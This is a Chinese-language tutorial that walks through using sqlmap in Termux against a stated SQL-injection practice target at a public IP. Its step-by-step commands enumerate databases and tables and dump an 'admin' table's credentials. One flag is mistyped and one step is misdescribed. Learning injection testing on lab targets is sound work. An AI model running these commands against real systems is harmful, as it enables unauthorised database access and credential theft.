【原创教程】Termux实例 sqlmap注入 教程
SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展，使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐，相当大一部分程序员在编写代码的时候，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一段数据库查询代码，根据程序返回的结果，获得某些他想得知的数据，这就是所谓的SQL Injection，即SQL注入。

sqlmap是一个自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL的SQL注入漏洞。

测试环境
具有sql注入点的靶机
59.63.200.79:8003

教学开始

第一步:打开Termux，输入
ls
查看是否安装sqlmap(我已经安装好了)，输入
cd sqlmap
打开sqlmap目录;

第二步:输入
python sqlmap.py "http://59.63.200.79:8003/?id=1"
对目标靶机判断，发现id=1，可以注入;

第三步:输入
python sqlmap.py "http://59.63.200.79:8003/?id=1" --dbs --batch
对目标靶机爆库;

第四步:输入
python sqlmap.py "http://59.63.200.79:8003/?id=1" -D maoshe ——tables
显示库了;

第五步:输入
python sqlmap.py "http://59.63.200.79:8003/?id=1" -D maoshe -T admin --columns
让账户密码显示出来;

第六步:输入
python sqlmap.py "http://59.63.200.79:8003/?id=1" -D maoshe -T admin --columns --dump
得到账号密码。

教程结束